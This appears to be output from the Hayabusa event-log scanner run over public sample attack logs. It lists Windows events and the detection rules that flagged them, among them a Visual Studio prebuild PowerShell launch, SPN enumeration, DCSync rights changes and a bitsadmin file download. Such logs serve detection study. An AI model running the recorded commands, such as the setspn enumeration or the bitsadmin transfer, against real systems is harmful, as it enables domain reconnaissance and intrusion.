2021-01-26 22:21:13.560 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.561 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\NuGetScratch\lock\3eaea9d73c9b6f131ef5b5e8a4cf9a7567b32fa3 | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 
00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.683 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.log | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln"" | LID: 0x26f746a2 | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.972 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: 
LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.399 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 
00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" 
@""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | 
Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: 
C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.229 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.303 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:23.305 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: 
C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-26 22:21:33.197 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx 2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx 2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx 2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,CredAccess,Possible 
SPN Enumeration,,rules/sigma/process_creation/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx 2021-02-04 00:17:16.085 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx 2021-02-04 00:33:16.107 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx 2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx 2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx 2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and 
Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx 2021-02-08 22:01:11.198 +09:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx 2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx 2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx 2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx 2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account 
manipulation/ID5136-4662 AD object owner changed.evtx 2021-02-23 07:57:19.435 +09:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx 2021-02-23 08:07:20.794 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx 2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx 2021-02-23 08:08:02.534 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx 2021-03-03 19:24:12.402 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft 
Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-03 19:33:48.102 +09:00,jump01.offsec.lan,7045,info,,New Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx 2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job 
Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 